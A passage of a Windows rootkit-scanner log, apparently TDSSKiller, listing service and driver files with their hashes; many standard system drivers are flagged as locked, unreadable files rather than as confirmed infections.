23:24:07.0391 0x18fc  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
23:24:07.0442 0x18fc  RasAuto - ok
23:24:07.0482 0x18fc  [ 87A6E852A22991580D6D39ADC4790463, 0F757C6E5B57DFC239CE1BEC88EF16C07E7F1A40D629A9A6DF3CB6B88FB9E642 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
23:24:07.0482 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rasl2tp.sys. md5: 87A6E852A22991580D6D39ADC4790463, sha256: 0F757C6E5B57DFC239CE1BEC88EF16C07E7F1A40D629A9A6DF3CB6B88FB9E642
23:24:07.0482 0x18fc  Rasl2tp - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0482 0x18fc  Object is SCO, delete is not allowed
23:24:07.0482 0x18fc  Rasl2tp ( LockedFile.Multi.Generic ) - warning
23:24:07.0482 0x18fc  Force sending object to P2P due to detect: Rasl2tp
23:24:07.0482 0x18fc  Object send P2P result: false
23:24:07.0512 0x18fc  [ 47394ED3D16D053F5906EFE5AB51CC83, FE5D1249788DB6D85C55769251B0AED738D3BBA04DF57124E03397D3C0599286 ] RasMan          C:\Windows\System32\rasmans.dll
23:24:07.0592 0x18fc  RasMan - ok
23:24:07.0622 0x18fc  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
23:24:07.0622 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\raspppoe.sys. md5: 855C9B1CD4756C5E9A2AA58A15F58C25, sha256: A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72
23:24:07.0622 0x18fc  RasPppoe - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0622 0x18fc  Object is SCO, delete is not allowed
23:24:07.0622 0x18fc  RasPppoe ( LockedFile.Multi.Generic ) - warning
23:24:07.0622 0x18fc  Force sending object to P2P due to detect: RasPppoe
23:24:07.0622 0x18fc  Object send P2P result: false
23:24:07.0642 0x18fc  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
23:24:07.0642 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rassstp.sys. md5: E8B1E447B008D07FF47D016C2B0EEECB, sha256: FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C
23:24:07.0642 0x18fc  RasSstp - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0642 0x18fc  Object is SCO, delete is not allowed
23:24:07.0642 0x18fc  RasSstp ( LockedFile.Multi.Generic ) - warning
23:24:07.0642 0x18fc  Force sending object to P2P due to detect: RasSstp
23:24:07.0642 0x18fc  Object send P2P result: false
23:24:07.0702 0x18fc  [ 3BAC8142102C15D59A87757C1D41DCE5, C0C2C6887EA5A439E69221196348382ACE3E1942C9C6E0A970E153890F71724C ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
23:24:07.0702 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rdbss.sys. md5: 3BAC8142102C15D59A87757C1D41DCE5, sha256: C0C2C6887EA5A439E69221196348382ACE3E1942C9C6E0A970E153890F71724C
23:24:07.0702 0x18fc  rdbss - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0702 0x18fc  Object is SCO, delete is not allowed
23:24:07.0702 0x18fc  rdbss ( LockedFile.Multi.Generic ) - warning
23:24:07.0702 0x18fc  Force sending object to P2P due to detect: rdbss
23:24:07.0702 0x18fc  Object send P2P result: false
23:24:07.0722 0x18fc  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
23:24:07.0722 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rdpbus.sys. md5: 302DA2A0539F2CF54D7C6CC30C1F2D8D, sha256: 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17
23:24:07.0722 0x18fc  rdpbus - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0722 0x18fc  rdpbus ( LockedFile.Multi.Generic ) - warning
23:24:07.0722 0x18fc  Force sending object to P2P due to detect: rdpbus
23:24:07.0732 0x18fc  Object send P2P result: false
23:24:07.0750 0x18fc  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
23:24:07.0750 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\RDPCDD.sys. md5: CEA6CC257FC9B7715F1C2B4849286D24, sha256: A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804
23:24:07.0751 0x18fc  RDPCDD - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0751 0x18fc  Object is SCO, delete is not allowed
23:24:07.0751 0x18fc  RDPCDD ( LockedFile.Multi.Generic ) - warning
23:24:07.0751 0x18fc  Force sending object to P2P due to detect: RDPCDD
23:24:07.0752 0x18fc  Object send P2P result: false
23:24:07.0794 0x18fc  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
23:24:07.0794 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\rdpencdd.sys. md5: BB5971A4F00659529A5C44831AF22365, sha256: 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F
23:24:07.0794 0x18fc  RDPENCDD - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0794 0x18fc  Object is SCO, delete is not allowed
23:24:07.0794 0x18fc  RDPENCDD ( LockedFile.Multi.Generic ) - warning
23:24:07.0814 0x18fc  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
23:24:07.0814 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\rdprefmp.sys. md5: 216F3FA57533D98E1F74DED70113177A, sha256: 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4
23:24:07.0814 0x18fc  RDPREFMP - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0814 0x18fc  RDPREFMP ( LockedFile.Multi.Generic ) - warning
23:24:07.0854 0x18fc  [ 8A3E6BEA1C53EA6177FE2B6EBA2C80D7, 02179089E0816AD544F370A8A3557498D09981F60CC94E497DC4A5A2BBBE1E48 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
23:24:07.0854 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\RDPWD.sys. md5: 8A3E6BEA1C53EA6177FE2B6EBA2C80D7, sha256: 02179089E0816AD544F370A8A3557498D09981F60CC94E497DC4A5A2BBBE1E48
23:24:07.0855 0x18fc  RDPWD - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0855 0x18fc  Object is SCO, delete is not allowed
23:24:07.0855 0x18fc  RDPWD ( LockedFile.Multi.Generic ) - warning
23:24:07.0886 0x18fc  [ 634B9A2181D98F15941236886164EC8B, 15C55F05FD3CD751F619F18E2ADF91552AE82146501CD031402277F496A5B7D8 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
23:24:07.0886 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\rdyboost.sys. md5: 634B9A2181D98F15941236886164EC8B, sha256: 15C55F05FD3CD751F619F18E2ADF91552AE82146501CD031402277F496A5B7D8
23:24:07.0896 0x18fc  rdyboost - detected LockedFile.Multi.Generic ( 1 )
23:24:07.0896 0x18fc  rdyboost ( LockedFile.Multi.Generic ) - warning
23:24:07.0936 0x18fc  [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess    C:\Windows\System32\mprdim.dll
23:24:08.0012 0x18fc  RemoteAccess - ok
23:24:08.0076 0x18fc  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
23:24:08.0129 0x18fc  RemoteRegistry - ok
23:24:08.0151 0x18fc  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
23:24:08.0218 0x18fc  RpcEptMapper - ok
23:24:08.0238 0x18fc  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator      C:\Windows\system32\locator.exe
23:24:08.0290 0x18fc  RpcLocator - ok
23:24:08.0350 0x18fc  [ 7266972E86890E2B30C0C322E906B027, BFA30E85F5BD3AA933913BD7C6D2B5993DB7AFB0C98349B61A6BEF0BDC8A3680 ] RpcSs           C:\Windows\system32\rpcss.dll
23:24:08.0390 0x18fc  RpcSs - ok
23:24:08.0470 0x18fc  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
23:24:08.0470 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\rspndr.sys. md5: DDC86E4F8E7456261E637E3552E804FF, sha256: D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD
23:24:08.0470 0x18fc  rspndr - detected LockedFile.Multi.Generic ( 1 )
23:24:08.0470 0x18fc  Object is SCO, delete is not allowed
23:24:08.0470 0x18fc  rspndr ( LockedFile.Multi.Generic ) - warning
23:24:08.0470 0x18fc  Force sending object to P2P due to detect: rspndr
23:24:08.0470 0x18fc  Object send P2P result: false
23:24:08.0550 0x18fc  [ 3A50489C017292386C1C6CF6EB283F23, 42E2C75A83A45070BB548591B83C3744F5DF6BB3743221D0442C1BA23789AD5D ] RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
23:24:08.0560 0x18fc  RtkAudioService - ok
23:24:08.0570 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] SamSs           C:\Windows\system32\lsass.exe
23:24:08.0580 0x18fc  SamSs - ok
23:24:08.0600 0x18fc  [ E3BBB89983DAF5622C1D50CF49F28227, 49370DC142D577D657BF5755AA9B8625C35D3DDAF1F9466B4888507FB8E6FF07 ] sbp2port        C:\Windows\system32\DRIVERS\sbp2port.sys
23:24:08.0600 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sbp2port.sys. md5: E3BBB89983DAF5622C1D50CF49F28227, sha256: 49370DC142D577D657BF5755AA9B8625C35D3DDAF1F9466B4888507FB8E6FF07
23:24:08.0600 0x18fc  sbp2port - detected LockedFile.Multi.Generic ( 1 )
23:24:08.0600 0x18fc  Object is SCO, delete is not allowed
23:24:08.0600 0x18fc  sbp2port ( LockedFile.Multi.Generic ) - warning
23:24:08.0600 0x18fc  Force sending object to P2P due to detect: sbp2port
23:24:08.0600 0x18fc  Object send P2P result: false
23:24:08.0710 0x18fc  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
23:24:08.0860 0x18fc  SCardSvr - ok
23:24:08.0930 0x18fc  [ B41DECEAD362C198F3EA5169658A884E, 801BA4CD256D4CB70D0BE6C8D0235F01FF626A6C38331C8D9AC5ADF96D1C926E ] SCDEmu          C:\Windows\system32\drivers\SCDEmu.sys
23:24:08.0930 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\SCDEmu.sys. md5: B41DECEAD362C198F3EA5169658A884E, sha256: 801BA4CD256D4CB70D0BE6C8D0235F01FF626A6C38331C8D9AC5ADF96D1C926E
23:24:08.0930 0x18fc  SCDEmu - detected LockedFile.Multi.Generic ( 1 )
23:24:08.0930 0x18fc  SCDEmu ( LockedFile.Multi.Generic ) - warning
23:24:08.0950 0x18fc  [ C94DA20C7E3BA1DCA269BC8460D98387, E1A5629728A79233B62BA87B4354BC3A332A853CC36A60E77B34923F4BCA8A61 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
23:24:08.0950 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\scfilter.sys. md5: C94DA20C7E3BA1DCA269BC8460D98387, sha256: E1A5629728A79233B62BA87B4354BC3A332A853CC36A60E77B34923F4BCA8A61
23:24:08.0950 0x18fc  scfilter - detected LockedFile.Multi.Generic ( 1 )
23:24:08.0950 0x18fc  scfilter ( LockedFile.Multi.Generic ) - warning
23:24:09.0060 0x18fc  [ EC56B171F85C7E855E7B0588AC503EEA, EDBC0E52DF00D73356F4B886D6CA2397B571A9D2245FEDC347A6D52A5467EA5D ] Schedule        C:\Windows\system32\schedsvc.dll
23:24:09.0110 0x18fc  Schedule - ok
23:24:09.0130 0x18fc  [ 312E2F82AF11E79906898AC3E3D58A1F, F6CB7D8B204B94F749D5DBEFD552150AAB16A34D629F87F73823A7504465F106 ] SCPolicySvc     C:\Windows\System32\certprop.dll
23:24:09.0160 0x18fc  SCPolicySvc - ok
23:24:09.0190 0x18fc  [ 765A27C3279CE11D14CB9E4F5869FCA5, B6C2EFFBA938828FEF7FE992A4C88B3154D053763C38762DCE13252FE9571FA1 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
23:24:09.0270 0x18fc  SDRSVC - ok
23:24:09.0630 0x18fc  [ 98EF79CC2B07398AC525F9EA1AE0366F, D0D5D69696ED339F363024AF3271867F4C55572C67FD0F2AA27D24B37982E39A ] SDScannerService C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
23:24:09.0710 0x18fc  SDScannerService - ok
23:24:09.0880 0x18fc  [ 14BF6B3AB327D519ED007CDDC56F6900, 4E5DC4AF45347C885E0E87F205EE1F95BB4713A0B581CD7317FBEEE2A9628982 ] SDUpdateService C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
23:24:09.0910 0x18fc  SDUpdateService - ok
23:24:09.0940 0x18fc  [ 820EBE67AB99F033FDE25B2692157991, A9E86FE6EFD3CFD4EA1A26121C706335A6791CC6F81EE98AE2BE7EA566ECFEBB ] SDWSCService    C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
23:24:09.0950 0x18fc  SDWSCService - ok
23:24:09.0990 0x18fc  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\Windows\system32\drivers\secdrv.sys
23:24:09.0990 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\secdrv.sys. md5: 3EA8A16169C26AFBEB544E0E48421186, sha256: 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D
23:24:09.0990 0x18fc  secdrv - detected LockedFile.Multi.Generic ( 1 )
23:24:09.0990 0x18fc  secdrv ( LockedFile.Multi.Generic ) - warning
23:24:09.0990 0x18fc  Force sending object to P2P due to detect: secdrv
23:24:09.0990 0x18fc  Object send P2P result: false
23:24:10.0000 0x18fc  [ 463B386EBC70F98DA5DFF85F7E654346, 8E27B18B04AF587719D1DAE75A042DB998E06CAE112BD68626EF046036D2DCDC ] seclogon        C:\Windows\system32\seclogon.dll
23:24:10.0050 0x18fc  seclogon - ok
23:24:10.0070 0x18fc  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS            C:\Windows\System32\sens.dll
23:24:10.0130 0x18fc  SENS - ok
23:24:10.0171 0x18fc  [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc        C:\Windows\system32\sensrsvc.dll
23:24:10.0222 0x18fc  SensrSvc - ok
23:24:10.0232 0x18fc  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
23:24:10.0232 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\serenum.sys. md5: CB624C0035412AF0DEBEC78C41F5CA1B, sha256: A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4
23:24:10.0232 0x18fc  Serenum - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0232 0x18fc  Object is SCO, delete is not allowed
23:24:10.0232 0x18fc  Serenum ( LockedFile.Multi.Generic ) - warning
23:24:10.0262 0x18fc  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial          C:\Windows\system32\DRIVERS\serial.sys
23:24:10.0262 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\serial.sys. md5: C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, sha256: 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D
23:24:10.0262 0x18fc  Serial - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0262 0x18fc  Object is SCO, delete is not allowed
23:24:10.0262 0x18fc  Serial ( LockedFile.Multi.Generic ) - warning
23:24:10.0262 0x18fc  Force sending object to P2P due to detect: Serial
23:24:10.0262 0x18fc  Object send P2P result: false
23:24:10.0272 0x18fc  [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse        C:\Windows\system32\DRIVERS\sermouse.sys
23:24:10.0272 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sermouse.sys. md5: 1C545A7D0691CC4A027396535691C3E3, sha256: 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D
23:24:10.0272 0x18fc  sermouse - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0272 0x18fc  Object is SCO, delete is not allowed
23:24:10.0272 0x18fc  sermouse ( LockedFile.Multi.Generic ) - warning
23:24:10.0272 0x18fc  Force sending object to P2P due to detect: sermouse
23:24:10.0282 0x18fc  Object send P2P result: false
23:24:10.0302 0x18fc  [ C3BC61CE47FF6F4E88AB8A3B429A36AF, 6CA53AD0CB7215BAE3467EC1FD490E3A18504BD6CD4F0FABF9BD37516AB9DFE0 ] SessionEnv      C:\Windows\system32\sessenv.dll
23:24:10.0362 0x18fc  SessionEnv - ok
23:24:10.0372 0x18fc  [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk         C:\Windows\system32\DRIVERS\sffdisk.sys
23:24:10.0372 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sffdisk.sys. md5: A554811BCD09279536440C964AE35BBF, sha256: DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55
23:24:10.0372 0x18fc  sffdisk - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0372 0x18fc  Object is SCO, delete is not allowed
23:24:10.0372 0x18fc  sffdisk ( LockedFile.Multi.Generic ) - warning
23:24:10.0372 0x18fc  Force sending object to P2P due to detect: sffdisk
23:24:10.0372 0x18fc  Object send P2P result: false
23:24:10.0392 0x18fc  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc        C:\Windows\system32\DRIVERS\sffp_mmc.sys
23:24:10.0392 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sffp_mmc.sys. md5: FF414F0BAEFEBA59BC6C04B3DB0B87BF, sha256: B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042
23:24:10.0392 0x18fc  sffp_mmc - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0392 0x18fc  Object is SCO, delete is not allowed
23:24:10.0392 0x18fc  sffp_mmc ( LockedFile.Multi.Generic ) - warning
23:24:10.0402 0x18fc  [ 178298F767FE638C9FEDCBDEF58BB5E4, 053D12CFEE5C54EA7D06F9C9CAE93544FE258A4825CDE2A14090BC81A96E1CF7 ] sffp_sd         C:\Windows\system32\DRIVERS\sffp_sd.sys
23:24:10.0402 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sffp_sd.sys. md5: 178298F767FE638C9FEDCBDEF58BB5E4, sha256: 053D12CFEE5C54EA7D06F9C9CAE93544FE258A4825CDE2A14090BC81A96E1CF7
23:24:10.0402 0x18fc  sffp_sd - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0402 0x18fc  Object is SCO, delete is not allowed
23:24:10.0402 0x18fc  sffp_sd ( LockedFile.Multi.Generic ) - warning
23:24:10.0402 0x18fc  Force sending object to P2P due to detect: sffp_sd
23:24:10.0402 0x18fc  Object send P2P result: false
23:24:10.0422 0x18fc  [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy         C:\Windows\system32\DRIVERS\sfloppy.sys
23:24:10.0422 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sfloppy.sys. md5: A9D601643A1647211A1EE2EC4E433FF4, sha256: 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9
23:24:10.0422 0x18fc  sfloppy - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0422 0x18fc  Object is SCO, delete is not allowed
23:24:10.0422 0x18fc  sfloppy ( LockedFile.Multi.Generic ) - warning
23:24:10.0422 0x18fc  Force sending object to P2P due to detect: sfloppy
23:24:10.0422 0x18fc  Object send P2P result: false
23:24:10.0472 0x18fc  [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
23:24:10.0582 0x18fc  SharedAccess - ok
23:24:10.0622 0x18fc  [ 0298AC45D0EFFFB2DB4BAA7DD186E7BF, 1C1D17301A4D37DBF906955CCABD2A3FDA47AFB24CBA978CF851123762249848 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
23:24:10.0662 0x18fc  ShellHWDetection - ok
23:24:10.0702 0x18fc  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2        C:\Windows\system32\DRIVERS\SiSRaid2.sys
23:24:10.0702 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\SiSRaid2.sys. md5: 843CAF1E5FDE1FFD5FF768F23A51E2E1, sha256: 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820
23:24:10.0702 0x18fc  SiSRaid2 - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0702 0x18fc  Object is SCO, delete is not allowed
23:24:10.0702 0x18fc  SiSRaid2 ( LockedFile.Multi.Generic ) - warning
23:24:10.0702 0x18fc  Force sending object to P2P due to detect: SiSRaid2
23:24:10.0702 0x18fc  Object send P2P result: false
23:24:10.0742 0x18fc  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4        C:\Windows\system32\DRIVERS\sisraid4.sys
23:24:10.0742 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\sisraid4.sys. md5: 6A6C106D42E9FFFF8B9FCB4F754F6DA4, sha256: 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E
23:24:10.0742 0x18fc  SiSRaid4 - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0742 0x18fc  Object is SCO, delete is not allowed
23:24:10.0742 0x18fc  SiSRaid4 ( LockedFile.Multi.Generic ) - warning
23:24:10.0742 0x18fc  Force sending object to P2P due to detect: SiSRaid4
23:24:10.0742 0x18fc  Object send P2P result: false
23:24:10.0913 0x18fc  [ 52F7E8603E888E3DB0A8B3D1804098E9, 4E23DC9442C0C14AAE7146DACBB0B39743F1FFAA463EE7069CCDF866AD27BD77 ] SkypeUpdate     C:\Program Files (x86)\Skype\Updater\Updater.exe
23:24:10.0923 0x18fc  SkypeUpdate - ok
23:24:10.0971 0x18fc  [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
23:24:10.0972 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\smb.sys. md5: 548260A7B8654E024DC30BF8A7C5BAA4, sha256: 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740
23:24:10.0973 0x18fc  Smb - detected LockedFile.Multi.Generic ( 1 )
23:24:10.0973 0x18fc  Object is SCO, delete is not allowed
23:24:10.0973 0x18fc  Smb ( LockedFile.Multi.Generic ) - warning
23:24:10.0995 0x18fc  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
23:24:11.0045 0x18fc  SNMPTRAP - ok
23:24:11.0055 0x18fc  [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr           C:\Windows\system32\drivers\spldr.sys
23:24:11.0055 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\spldr.sys. md5: B9E31E5CACDFE584F34F730A677803F9, sha256: 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063
23:24:11.0055 0x18fc  spldr - detected LockedFile.Multi.Generic ( 1 )
23:24:11.0055 0x18fc  Object is SCO, delete is not allowed
23:24:11.0055 0x18fc  spldr ( LockedFile.Multi.Generic ) - warning
23:24:11.0267 0x18fc  [ 89E8550C5862999FCF482EA562B0E98E, 11BC94FD879DCD22E80DB8FA73CEBD0F072917C546AD9C8B92CCFBF4E0B83056 ] Spooler         C:\Windows\System32\spoolsv.exe
23:24:11.0307 0x18fc  Spooler - ok
23:24:11.0762 0x18fc  [ 913D843498553A1BC8F8DBAD6358E49F, F8B931FDABF669D642CBDCD2FF31E07F8A5E2D5F72E11D4A8FF219CCFB5825E9 ] sppsvc          C:\Windows\system32\sppsvc.exe
23:24:11.0914 0x18fc  sppsvc - ok
23:24:11.0934 0x18fc  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
23:24:11.0964 0x18fc  sppuinotify - ok
23:24:12.0044 0x18fc  [ 43067A65522EAEC33D31A12D6FA8E3F4, 244CE66A10B34DC756962D0A164B34B98D89AB41B64C7AAF1F31E8642D8B013B ] srv             C:\Windows\system32\DRIVERS\srv.sys
23:24:12.0044 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\srv.sys. md5: 43067A65522EAEC33D31A12D6FA8E3F4, sha256: 244CE66A10B34DC756962D0A164B34B98D89AB41B64C7AAF1F31E8642D8B013B
23:24:12.0044 0x18fc  srv - detected LockedFile.Multi.Generic ( 1 )
23:24:12.0044 0x18fc  Object is SCO, delete is not allowed
23:24:12.0044 0x18fc  srv ( LockedFile.Multi.Generic ) - warning
23:24:12.0044 0x18fc  Force sending object to P2P due to detect: srv
23:24:12.0044 0x18fc  Object send P2P result: false
23:24:12.0304 0x18fc  [ 03715CF9C30B563DA35FC5F2B8F7B8E0, 694EE380955AAD3E21DD72D2656141017E113EC726E5CBE856EF4D7E4FE10387 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
23:24:12.0304 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\srv2.sys. md5: 03715CF9C30B563DA35FC5F2B8F7B8E0, sha256: 694EE380955AAD3E21DD72D2656141017E113EC726E5CBE856EF4D7E4FE10387
23:24:12.0304 0x18fc  srv2 - detected LockedFile.Multi.Generic ( 1 )
23:24:12.0304 0x18fc  Object is SCO, delete is not allowed
23:24:12.0304 0x18fc  srv2 ( LockedFile.Multi.Generic ) - warning
23:24:12.0304 0x18fc  Force sending object to P2P due to detect: srv2
23:24:12.0304 0x18fc  Object send P2P result: false
